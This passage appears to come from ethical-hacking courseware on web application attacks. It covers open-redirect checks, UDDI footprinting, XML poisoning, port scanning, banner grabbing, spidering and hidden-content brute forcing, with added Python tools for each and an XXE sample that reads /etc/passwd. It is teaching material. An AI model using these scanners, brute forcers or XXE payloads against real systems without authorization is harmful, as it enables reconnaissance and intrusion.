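    if "\\" in url_param or "\r" in url_param or "\n" in url_param:
        return fallback                    # backslash-as-slash tricks, header injection
    parts = urlsplit(url_param)
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: must be an absolute path on this site, and not '//host'
        if url_param.startswith("/") and not url_param.startswith("//"):
            return url_param
        return fallback
    # parts.hostname strips userinfo and port, so 'https://www.juggyboy.com@evil/'
    # resolves to 'evil' and is rejected; lookalike subdomains fail the exact match.
    if parts.scheme in ("http", "https") and parts.hostname == SITE_HOST:
        return url_param
    return fallback


FORWARD_TARGETS = {"confirm": "confirm.jsp", "receipt": "receipt.jsp"}   # constructed


def vulnerable_forward(fwd_param: str) -> str:
    """purchase.jsp?fwd=admin.jsp as drawn: forwards to whatever page is named."""
    return fwd_param


def safe_forward(fwd_param: str, is_admin: bool = False) -> str:
    """Map a short key to a server-side page, never a caller-supplied filename, and
    authorize against the destination rather than the entry page."""
    if fwd_param == "admin":
        return "admin.jsp" if is_admin else "purchase.jsp"
    return FORWARD_TARGETS.get(fwd_param, "purchase.jsp")
```

The fallback is deliberately the site root rather than an error page: a redirect endpoint that echoes the rejected value in an error message is itself a phishing aid.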
Web Services Architecture
Web Services Architecture
The web services security stack shown in the figure is layered as follows, from top to bottom:
• WS-Work Processes
• WS-Security: WS-SecureConversation, WS-Federation, WS-Trust, WS-Policy and WS-SecurityPolicy
• Security Token Profiles: SAML, Kerberos, X.509
• XML Encryption, XML Digital Signatures
• XML, SOAP, WSDL, Schema, WS-Addressing, etc.
• Transport: HTTP, .Net TCP Channel, Fast InfoSet, etc.
FIGURE 13.29: Web Services Architecture
Web Services Attack
Web services evolution and its increasing use in business offer new attack vectors in an application framework.
Web services are based on XML protocols such as Web Services Description Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services.
Web Services Attack
Web services evolution and its increasing use in business offer new attack vectors in an application framework. Web services are process-to-process communications with their own security issues and needs. They are based on XML protocols such as Web Services Description Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web services, and they are exposed to the same web application threats as any other HTTP endpoint. Just as a user interacts with a web application through a browser, a web service can interact directly with the web application without the need for an interactive user session or a browser.
These web services publish detailed definitions that allow regular users and attackers alike to understand the construction of the service. In this way, much of the information required to fingerprint the environment and formulate an attack is handed to the attacker. It is estimated that web services reintroduce 70% of the vulnerabilities on the web. Some examples of this type of attack are:
• An attacker injects a malicious script into a web service and is able to disclose and modify application data.
• An attacker using a web service for ordering products injects a script that resets the quantity and status on the confirmation page to less than what was originally ordered.
Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil
All Rights Reserved. R eproduction is Strictly Prohibited.
M odule 13Page 1819
In this way, th e system processing th e o rd e r reque st subm its th e order, ships th e order,
and th e n m od ifie s th e o rd e r to show th a t a sm aller n u m b e r o f p roducts are being
shipped. The atta cker w inds up receiving m o re o f th e p ro d u c t th an he o r she pays for.
Web Services Footprinting Attack
Web Services Footprinting Attack

Attackers use the Universal Business Registry (UBR) as a major source of information about web services. It is a public registry, useful to businesses and individuals alike, that runs on the UDDI specification over SOAP, and it is somewhat similar to a WHOIS server in function. To register web services on a UDDI server, a business or organization uses one of the following structures:

- businessEntity
- businessService
- bindingTemplate
- tModel (technical model)

Hence, attackers footprint a web application to get UDDI information such as businessEntity, businessService, bindingTemplate, and tModel. The figure shows a find_business inquiry sent to the UDDI registry at uddi.microsoft.com and the serviceList that comes back, carrying a serviceKey and a businessKey for every service the business has published.
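The exchange in Figure 13.30, as an added example in Python (not the courseware's own code): build the find_business inquiry, send it to a registry, and extract the operator, the truncation flag and the serviceKey/businessKey pairs from the serviceList that comes back. The registry host is a parameter; the sample response is constructed with placeholder keys, and uddi_inquire needs network access and is not exercised by the stub data.

```python
import http.client
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
UDDI_NS = "urn:uddi-org:api_v2"


def build_find_business(name, max_rows=50):
    """Build the UDDI v2 find_business inquiry body shown in Figure 13.30.
    The business name is XML-escaped so the caller cannot poison the request."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Envelope xmlns="%s"><Body>'
        '<find_business generic="2.0" maxRows="%d" xmlns="%s">'
        '<name>%s</name>'
        '</find_business></Body></Envelope>'
    ) % (SOAP_NS, max_rows, UDDI_NS, escape(name))


def uddi_inquire(host, body, path="/inquire", timeout=10):
    """POST the inquiry to a UDDI registry (live network; not run by the test)."""
    conn = http.client.HTTPConnection(host, timeout=timeout)
    conn.request("POST", path, body=body.encode("utf-8"), headers={
        "Content-Type": "text/xml; charset=utf-8",
        "SOAPAction": '""',           # UDDI v2 requires an empty SOAPAction
    })
    resp = conn.getresponse()
    return resp.status, resp.read().decode("utf-8", "replace")


def parse_service_list(xml_text):
    """Pull the footprinting data out of a serviceList response: the registry
    operator, whether the list was truncated, and one record per serviceInfo."""
    ns = {"s": SOAP_NS, "u": UDDI_NS}
    root = ET.fromstring(xml_text)
    service_list = root.find("s:Body/u:serviceList", ns)
    if service_list is None:
        raise ValueError("not a UDDI serviceList response")
    services = []
    for info in service_list.findall("u:serviceInfos/u:serviceInfo", ns):
        name_el = info.find("u:name", ns)
        services.append({
            "serviceKey": info.get("serviceKey"),
            "businessKey": info.get("businessKey"),
            "name": (name_el.text or "").strip() if name_el is not None else "",
        })
    return {
        "operator": service_list.get("operator"),
        "truncated": service_list.get("truncated") == "true",
        "services": services,
    }


# Constructed response in the layout of Figure 13.30; the keys are placeholders,
# not values from any real registry.
SAMPLE_RESPONSE = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soap:Body>'
    '<serviceList generic="2.0" operator="Example Registry" truncated="true"'
    ' xmlns="urn:uddi-org:api_v2"><serviceInfos>'
    '<serviceInfo serviceKey="00000000-0000-4000-8000-000000000001"'
    ' businessKey="10000000-0000-4000-8000-000000000001">'
    '<name xml:lang="en-us">Order Inquiry</name></serviceInfo>'
    '<serviceInfo serviceKey="00000000-0000-4000-8000-000000000002"'
    ' businessKey="10000000-0000-4000-8000-000000000001">'
    '<name xml:lang="en">Order Submit</name></serviceInfo>'
    '</serviceInfos></serviceList></soap:Body></soap:Envelope>'
)
```

The keys are what the footprinting is after: with a serviceKey, a get_serviceDetail inquiry returns the bindingTemplates, whose accessPoint and tModel references lead to the service endpoint and its WSDL, which is the next thing an attacker fetches. A truncated="true" flag means the registry holds more entries than maxRows returned, so the inquiry is repeated with a larger window.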
XML Query

POST /inquire HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.4.2_04
Host: uddi.microsoft.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 229

<?xml version="1.0" encoding="UTF-8" ?>
<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/">
  <Body>
    <find_business generic="2.0" maxRows="50" xmlns="urn:uddi-org:api_v2">
      <name>amazon</name>
    </find_business>
  </Body>
</Envelope>

XML Response

HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Date: Tue, 28 Sep 2004 10:07:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 1272

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <serviceList generic="2.0" operator="Microsoft Corporation" truncated="false"
        xmlns="urn:uddi-org:api_v2">
      <serviceInfos>
        <serviceInfo serviceKey="..." businessKey="..."><name xml:lang="en-us"> </name></serviceInfo>
        (five serviceInfo entries in the original capture; the key values are not legible in the reproduction)
      </serviceInfos>
    </serviceList>
  </soap:Body>
</soap:Envelope>

FIGURE 13.30: Web Services Footprinting Attack
Web Services XML Poisoning
XML Request (the legitimate CustomerRecord):

<CustomerRecord>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName>
  <LastName>Springfield</LastName>
  <Address>Apt 20, 3rd Street</Address>
  <Email>jason@springfield.com</Email>
  <PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>

Poisoned XML Request (the CustomerNumber and FirstName nodes are injected a second time):

<CustomerRecord>
  <CustomerNumber>2010</CustomerNumber>
  <FirstName>Jason</FirstName><CustomerNumber>
  2010</CustomerNumber>
  <FirstName>Jason</FirstName>
  <LastName>Springfield</LastName>
  <Address>Apt 20, 3rd Street</Address>
  <Email>jason@springfield.com</Email>
  <PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>
Web Services XML Poisoning
XML poisoning is similar to SQL injection and has a higher success rate against a web services framework. Because web services are invoked with XML documents, the traffic between the client and the server can be poisoned: attackers craft malicious XML documents that disturb the parsing mechanisms (SAX and DOM) used on the server. Attackers insert malicious XML into SOAP requests to perform XML node manipulation (for example, repeating the CustomerNumber and FirstName nodes as in the poisoned request above, so that it is ambiguous which value the application will act on) or XML schema poisoning, in order to generate errors in the XML parsing logic and break the execution logic. Attackers can also manipulate XML external entity (XXE) references, which can lead to arbitrary file reads or outbound TCP connections from the server and can be chained into other web service attacks. XML poisoning thus lets attackers cause a denial of service and compromise confidential information.
FIGURE 13.31: Web Services XML Poisoning
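As an added example (not part of the courseware), the following Python function inspects a SOAP payload for the three poisoning patterns just described before it reaches the application's own parser: a declared DTD or entity (the carrier for XML external entity attacks), duplicated nodes (the node manipulation in the poisoned CustomerRecord of Figure 13.31, and the same trick the order-quantity example in the Web Services Attack section relies on), and malformed nesting (schema poisoning). The sample records are constructed, modelled on Figure 13.31; only the Python standard library is used.

```python
import xml.parsers.expat
from collections import Counter


def inspect_xml_payload(xml_text):
    """Inspect one XML payload (e.g. the body of a SOAP request) before it
    reaches the application's parser.

    Returns a list of findings; an empty list means nothing suspicious.
    Each finding is prefixed with its category: "malformed", "doctype",
    "entity" or "duplicate".
    """
    findings = []
    depth = 0
    top_level_children = Counter()   # direct children of the document element

    parser = xml.parsers.expat.ParserCreate()
    # Never resolve parameter entities: a DTD must not be able to pull more
    # DTD in from the network while we are only inspecting the document.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # A DOCTYPE is the carrier for XXE and entity-expansion (billion laughs)
        # attacks; a SOAP message has no legitimate reason to declare one.
        findings.append("doctype: DTD declared for <%s>; possible XXE or entity expansion" % name)

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "external" if sysid else "internal"
        findings.append("entity: %s entity '%s' declared" % (kind, name))

    def on_start(name, attrs):
        nonlocal depth
        if depth == 1:
            top_level_children[name] += 1
        depth += 1

    def on_end(name):
        nonlocal depth
        depth -= 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end

    try:
        parser.Parse(xml_text, True)
    except xml.parsers.expat.ExpatError as exc:
        # Broken nesting or stray tags: the schema-poisoning case that aims to
        # make SAX and DOM consumers disagree or throw.
        findings.append("malformed: %s" % exc)
        return findings

    # Node manipulation: a record that repeats a field it should carry once.
    # Two parsers may pick different copies, so reject rather than guess.
    for name, count in top_level_children.items():
        if count > 1:
            findings.append("duplicate: <%s> appears %d times" % (name, count))
    return findings


# Constructed samples, modelled on Figure 13.31.
CLEAN_RECORD = """<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

POISONED_RECORD = """<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>
2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>"""

# External entity reference: a server-side parser that resolves entities
# would read the named file into the record (constructed XXE sample).
XXE_RECORD = """<?xml version="1.0"?>
<!DOCTYPE CustomerRecord [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<CustomerRecord><CustomerNumber>&xxe;</CustomerNumber></CustomerRecord>"""
```

The duplicate check is deliberately strict: an application that accepts the poisoned record ends up with two CustomerNumber values, and a SAX consumer, a DOM consumer, a WAF and the backend may not agree on which one wins. In production the equivalent of the DOCTYPE check is to configure the real parser to forbid DTDs outright, which is what libraries such as defusedxml do for Python's XML modules.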
Module Flow
So far, we have discussed web application components and the various threats associated with web applications. Now we will discuss the web application hacking methodology. A hacking methodology is a systematic way of checking every possible route to compromising the web application by attempting to exploit all the potential vulnerabilities present in it.
The module flow covers: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, and Web App Pen Testing.

This section gives a detailed explanation of the web application hacking methodology.
Web App Hacking Methodology
In order to hack a web application, the attacker first tries to gather as much information as possible about the web infrastructure. Footprinting is one method by which an attacker can gather valuable information about the web infrastructure or the web application.
Footprint Web Infrastructure
Web infrastructure footprinting is the first step in web application hacking; it helps attackers select victims and identify vulnerable web applications.

- Server Discovery: discover the physical servers that host the web application
- Service Discovery: discover the services running on those web servers that can be exploited as attack paths for web app hacking
- Server Identification: grab server banners to identify the make and version of the web server software
- Hidden Content Discovery: extract content and functionality that is not directly linked or reachable from the main visible content
Footprint Web Infrastructure

Web infrastructure footprinting is the first step in web application hacking; it helps attackers select victims and identify vulnerable web applications. Through web infrastructure footprinting, an attacker can perform:

Server Discovery

Server discovery locates the physical servers that host the web application. It confirms which hosts are alive and reachable on the Internet, using WHOIS lookups, DNS interrogation, and port scanning.

Service Discovery

Service discovery finds the services running on the web servers that can be exploited as attack paths for web app hacking. It scans the targeted application environment for listening ports and the services behind them.

Server Identification

Server identification grabs the server banner to identify the make and version of the web server software. The banner is read from the HTTP response headers, chiefly the Server header, together with secondary headers such as X-Powered-By, X-AspNet-Version, and Via, which reveal the application framework and any intermediate proxies.

Hidden Content Discovery

Hidden content discovery extracts content and functionality that is not directly linked or reachable from the main visible content.
Footprint Web Infrastructure: Server Discovery
In order to footprint a web infrastructure, you first need to discover the active servers on the Internet. Server discovery gives information about the location of the active servers and confirms that the target server is alive. Three techniques, namely WHOIS lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.

Whois Lookup

A WHOIS lookup gathers information about a domain with the help of DNS and WHOIS queries: the registrant, the name servers, and the IP address of the web server, typically presented as an HTML report. Some of the WHOIS lookup tools are:

- http://www.tamos.com
- http://netcraft.com
- http://www.whois.net
- http://www.dnsstuff.com
DNS Interrogation

DNS is the distributed database that organizations use to map their hostnames to IP addresses and vice versa; DNS interrogation queries that database. When DNS is configured improperly (for example, when zone transfers are allowed to anyone), it is very easy to gather the information required to launch an attack on the target organization. DNS interrogation also provides information about the location and type of servers. Some of the tools are:

- http://www.dnsstuff.com
- http://network-tools.com
- http://e-dns.org
- http://www.domaintools.com
Port Scanning

Port scanning probes the system's ports to recognize the open doors. If an attacker finds an open port that the organization did not intend to expose, he or she can use it to intrude into the system. The method attempts to connect to a particular set of TCP or UDP ports to find out which services exist on the server. Some of the tools are:

- Nmap
- NetScan Tools Pro
- WhatsUp PortScanner Tool
- Hping
Footprint Web Infrastructure: Service Discovery
Service discovery finds the services running on web servers that can be exploited as attack paths for web application hacking. It scans the targeted application environment for listening ports and the services behind them. The target server has to be scanned thoroughly so that the common ports used by web servers for different services can be identified. The following table lists common ports used by web servers and the respective HTTP services:
Port    Typical HTTP Services
80      World Wide Web standard port
81      Alternate WWW
88      Kerberos
443     SSL (https)
900     IBM WebSphere administration client
2301    Compaq Insight Manager
2381    Compaq Insight Manager over SSL
4242    Microsoft Application Center remote management
7001    BEA WebLogic
7002    BEA WebLogic over SSL
7070    Sun Java Web Server over SSL
8000    Alternate web server, or web cache
8001    Alternate web server or management
8005    Apache Tomcat (shutdown port; the HTTP connector defaults to 8080)
9090    Sun Java Web Server admin module
10000   Netscape Administrator interface

TABLE 13.1: Service Discovery
You can discover the services with the help of tools such as Nmap, NetScan Tools Pro, and Sandcat Browser.

Source: http://nmap.org

Nmap is a scanner used to find information about systems and services on a network and to construct a map of the network. It can also identify the different services running on the web server (the -sV option, included in -A, probes open ports for service and version information) and give detailed information about the remote computers.
Zenmap (the Nmap GUI) run against google.com with the command:

nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 google.com

Ports/Hosts tab of the result:

Port   Protocol   State    Service
80     tcp        open     http
113    tcp        closed   ident
443    tcp        open     https

FIGURE 13.32: Zenmap tool screenshot
Footprint Web Infrastructure: Server Identification/Banner Grabbing

Through banner grabbing, an attacker identifies the brand and/or version of a server, an operating system, or an application. Attackers analyze the server response header fields to identify the make, model, and version of the web server software. This information helps attackers select exploits from vulnerability databases to attack the web server and its applications. The simplest banner grab is a raw HEAD request typed into a telnet session:

C:\> telnet www.juggyboy.com 80
HEAD / HTTP/1.0

(press Enter twice after the request line; the empty line terminates the request headers)

A banner can be grabbed with the help of tools such as:

- Telnet
- Netcat
- ID Serve
- Netcraft

These tools make banner grabbing and analysis an easy task.
Server identified as Microsoft IIS from the response headers:

HTTP/1.1 200 OK
Server: <value obscured by the callout in the original screenshot>
Date: Thu, 07 Jul 2005 13:08:16 GMT
Content-Length: 1270
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGKOFFIPOLHPLNE; path=/
Via: 1.1 Application and Content Networking System Software 5.1.15
Connection: Close

Connection to host lost.
C:\>

FIGURE 13.33: Server Identification/Banner Grabbing
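Combining the service discovery and server identification steps above, as an added example in Python (not the courseware's code): probe_ports performs the TCP connect scan over the ports from Table 13.1, head_request sends the same HEAD / HTTP/1.0 as the telnet session in Figure 13.33, and parse_banner extracts the headers that fingerprint the server. The sample response is constructed, modelled on Figure 13.33 with the obscured Server value filled in as Microsoft-IIS/6.0; the TLS port set and the timeouts are assumptions, and the two network functions are not exercised offline.

```python
import socket
import ssl

# Ports from Table 13.1 (the module's list of ports commonly used by web servers)
WEB_PORTS = [80, 81, 88, 443, 900, 2301, 2381, 4242, 7001, 7002, 7070,
             8000, 8001, 8005, 9090, 10000]
TLS_PORTS = {443, 2381, 7002, 7070}   # the table entries described as "over SSL" (assumption)


def probe_ports(host, ports=WEB_PORTS, timeout=1.0):
    """Service discovery: TCP-connect to each candidate port, return the open ones."""
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)
        except OSError:
            pass            # closed, filtered, or host unreachable
    return open_ports


def head_request(host, port=80, timeout=3.0):
    """Server identification: the same 'HEAD / HTTP/1.0' the module types into
    telnet, sent over a raw socket (TLS-wrapped for the SSL ports). Live network."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if port in TLS_PORTS:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False          # we want the banner, not a trust decision
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode("idna") + b"\r\n\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def parse_banner(raw):
    """Parse a raw HTTP response into (status line, headers, fingerprint), where the
    fingerprint holds the fields that identify the server, the framework and any
    proxy in front of it."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    fingerprint = {
        "server": headers.get("server", ""),              # make/version of the web server
        "powered_by": headers.get("x-powered-by", ""),    # application framework
        "framework_version": headers.get("x-aspnet-version", ""),
        "via": headers.get("via", ""),                    # intermediate proxies / caches
        "session_cookie": headers.get("set-cookie", "").split("=", 1)[0],
    }
    return lines[0], headers, fingerprint


def fingerprint_host(host, ports=WEB_PORTS):
    """Tie the two steps together (live network): probe, then grab every banner."""
    results = {}
    for port in probe_ports(host, ports):
        try:
            status, _, fp = parse_banner(head_request(host, port))
            results[port] = dict(fp, status=status)
        except (OSError, ssl.SSLError) as exc:
            results[port] = {"error": str(exc)}
    return results


# Constructed response modelled on Figure 13.33 (Server value filled in for the example)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"Date: Thu, 07 Jul 2005 13:08:16 GMT\r\n"
    b"Content-Length: 1270\r\n"
    b"Content-Type: text/html\r\n"
    b"X-Powered-By: ASP.NET\r\n"
    b"Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGKOFFIPOLHPLNE; path=/\r\n"
    b"Via: 1.1 Application and Content Networking System Software 5.1.15\r\n"
    b"Connection: Close\r\n\r\n"
)
```

A blank or generic Server header does not end the identification: X-Powered-By, X-AspNet-Version and the ASPSESSIONID cookie name in the sample still give away ASP.NET on IIS, and the Via header shows a caching proxy in the path whose own version string is a further target. A connect scan such as probe_ports is noisy and slow; Nmap's -sV does the same job with service probes, and the script is here to make the mechanism visible.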
Footprint Web Infrastructure: Hidden Content Discovery
Footprint Web Infrastructure: Hidden Content Discovery
Applications often contain content and functionality that is not reachable from the main visible content: backup copies of live files, configuration files and log files containing sensitive data, backup archives holding snapshots of files within the web root, new functionality that is not yet linked from the main application, administrative interfaces, and hidden form fields carrying values such as prices, discounts, or identifiers that the application assumes a user cannot see or change. Discovering this hidden content lets an attacker exploit user privileges within the application and recover data the developers never meant to publish. Hidden content can be discovered with three techniques:
Web Spidering

Web spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript in requests and responses.

Tools that can be used to discover hidden content by means of web spidering include:

- OWASP Zed Attack Proxy
- Burp Spider
- WebScarab
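A minimal web spider in Python, as an added example (not the courseware's code, and not how Burp Spider or ZAP are implemented): it parses links, forms (including hidden input fields) and path-like string literals in inline JavaScript, and follows what it finds on the same host. The target site is a constructed stub on the hypothetical host app.example; http_fetch is a real fetcher for use against a target you are authorized to test.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urldefrag, urlparse

# Paths hidden in inline JavaScript, e.g. fetch("/api/v1/orders"); absolute paths only (assumption)
JS_PATH_RE = re.compile(r"""["'](/[A-Za-z0-9_./?=&%-]+)["']""")


class PageExtractor(HTMLParser):
    """Collect link targets, forms (every input, hidden ones included) and
    path-like string literals from inline JavaScript on one page."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.links = set()
        self.forms = []
        self._in_script = False

    def _add(self, target):
        if target:
            self.links.add(urljoin(self.page_url, target))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("a", "link", "area"):
            self._add(a.get("href"))
        elif tag in ("img", "iframe", "frame"):
            self._add(a.get("src"))
        elif tag == "script":
            self._add(a.get("src"))
            self._in_script = True
        elif tag == "form":
            action = urljoin(self.page_url, a.get("action") or self.page_url)
            self.forms.append({"action": action,
                               "method": (a.get("method") or "get").upper(),
                               "inputs": []})
            self.links.add(action)
        elif tag == "input" and self.forms:
            field = (a.get("name"), a.get("type", "text"), a.get("value"))
            self.forms[-1]["inputs"].append(field)
            if field[2] and field[2].startswith("/"):
                self._add(field[2])       # hidden fields often carry a redirect target

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            for path in JS_PATH_RE.findall(data):
                self._add(path)


def spider(start_url, fetch, max_pages=500):
    """Breadth-first crawl of one host. fetch(url) -> (status, content_type, body_text).
    Returns a site map: url -> {"status", "forms"}. Non-HTML responses are recorded
    but not parsed; off-host URLs are skipped."""
    host = urlparse(start_url).netloc
    queue = [urldefrag(start_url)[0]]
    sitemap = {}
    while queue and len(sitemap) < max_pages:
        url = queue.pop(0)
        if url in sitemap or urlparse(url).netloc != host:
            continue
        status, content_type, body = fetch(url)
        extractor = PageExtractor(url)
        if "html" in content_type.lower():
            extractor.feed(body)
        sitemap[url] = {"status": status, "forms": extractor.forms}
        for link in extractor.links:
            link = urldefrag(link)[0]
            if link not in sitemap and link not in queue:
                queue.append(link)
    return sitemap


def http_fetch(url, timeout=10):
    """A real fetcher for spider() (live network; the test uses the stub below)."""
    import urllib.error
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Content-Type", ""), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Content-Type", ""), ""


# Constructed target standing in for a live application (hypothetical host app.example)
SAMPLE_SITE = {
    "http://app.example/": (200, "text/html",
        '<a href="/login">Login</a> <a href="/about#team">About</a>'
        '<script>var api = "/api/v1/orders";</script>'
        '<form action="/login" method="post"><input name="user">'
        '<input type="hidden" name="next" value="/admin/dashboard"></form>'),
    "http://app.example/login": (200, "text/html", '<a href="http://cdn.example/lib.js">x</a>'),
    "http://app.example/about": (200, "text/html", "<p>About us</p>"),
    "http://app.example/api/v1/orders": (401, "application/json", "{}"),
    "http://app.example/admin/dashboard": (403, "text/html", "Forbidden"),
}


def stub_fetch(url):
    return SAMPLE_SITE.get(url, (404, "text/html", "Not Found"))
```

In the constructed site the hidden field next and the inline script reveal /admin/dashboard and /api/v1/orders, which no anchor links to; the 403 and 401 they return confirm that the functionality exists, which is exactly the kind of finding the spider's site map is meant to surface for the brute forcing and manual testing that follow.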
Attacker-Directed Spidering

The attacker manually walks through all of the application's functionality while an intercepting proxy monitors every request and response. The proxy parses all of the application's responses and reports the content and functionality it discovers. This catches what an automated spider misses: multi-stage forms, functions reached only after authentication, and links generated by JavaScript at run time. The same tool used for web spidering, OWASP Zed Attack Proxy, can also be used for attacker-directed spidering.

Brute Forcing

Brute forcing is a very popular and easy method of attacking web servers. Automation tools such as Burp Suite (Intruder) are used to make large numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality.
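Brute forcing hidden content, as an added example in Python (not the courseware's code and not a description of Burp Intruder's internals): candidates derives guesses from the paths a spider has already found, and brute_force requests them after calibrating against random names so that a server answering 200 for everything does not produce a page of false positives. The wordlist and suffix list are short hypothetical seeds; the target is a constructed stub on the hypothetical host app.example.

```python
import random
import string
from urllib.parse import urljoin, urlsplit

# Hypothetical seed wordlist; a real run uses the lists shipped with Burp Intruder,
# DirBuster or similar (thousands of entries, not reproduced here).
COMMON_NAMES = ["admin", "backup", "config", "old", "test", "logs", "upload",
                "phpinfo.php", "web.config", ".env", ".git", ".svn"]
BACKUP_SUFFIXES = [".bak", ".old", ".orig", "~", ".swp", ".zip", ".tar.gz"]


def candidates(known_paths, names=COMMON_NAMES, suffixes=BACKUP_SUFFIXES):
    """Turn the paths a spider already found into guesses: common names in every
    known directory, plus backup/editor variants of every known file."""
    guesses = set()
    dirs = {"/"}
    for path in known_paths:
        directory = path.rsplit("/", 1)[0] + "/"
        dirs.add(directory)
        if not path.endswith("/"):
            for suffix in suffixes:
                guesses.add(path + suffix)
    for directory in dirs:
        for name in names:
            guesses.add(directory + name)
    return sorted(guesses - set(known_paths))


def brute_force(fetch, base_url, guesses, calibration_samples=3, seed=0):
    """Request every guess and return {path: status} for the ones that exist.

    fetch(url) -> (status, body_length). The server is first calibrated with
    random names so that a "soft 404" (a 200 with a generic page for every
    unknown path) is not mistaken for hidden content."""
    rng = random.Random(seed)

    def random_path():
        return "/" + "".join(rng.choice(string.ascii_lowercase) for _ in range(14))

    missing_signatures = {fetch(urljoin(base_url, random_path()))
                          for _ in range(calibration_samples)}
    found = {}
    for path in guesses:
        status, length = fetch(urljoin(base_url, path))
        if (status, length) in missing_signatures:
            continue                          # looks exactly like "not found"
        if status in (200, 204, 301, 302, 401, 403, 405):
            found[path] = status              # exists (401/403: exists but protected)
    return found


# Constructed target with a soft 404: every unknown path gets a 200 and a 120-byte page
SAMPLE_SITE = {
    "/": (200, 2300),
    "/index.php": (200, 2300),
    "/admin/login.php": (200, 900),
    "/index.php.bak": (200, 5400),   # backup copy of a live file: source disclosure
    "/admin/config": (403, 300),     # exists, access denied
    "/.git": (301, 0),               # exposed repository metadata
}


def stub_fetch(url):
    return SAMPLE_SITE.get(urlsplit(url).path, (200, 120))
```

The calibration step is the check a practitioner wants before believing any result: Burp Intruder exposes the same signal through its status and length columns, and a list of hits that all share one response length is almost always a soft 404. Run this only against systems you are authorized to test; thousands of requests per directory are not subtle.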
Web Spidering Using Burp Suite
Web Spidering Using Burp Suite
Source: http://www.portswigger.net

Burp Suite is an integrated platform for attacking web applications. It contains all the Burp tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application.

Burp Suite allows you to combine manual and automated techniques to enumerate, analyze, scan, attack, and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.

Web spidering using Burp Suite is done in the following manner:

1. Configure your web browser to use Burp as a local proxy
2. Access the entire target application, visiting every single link/URL possible, and submit all the application forms available
3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled
4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions
5. Continue these steps recursively until no further content or functionality is identified
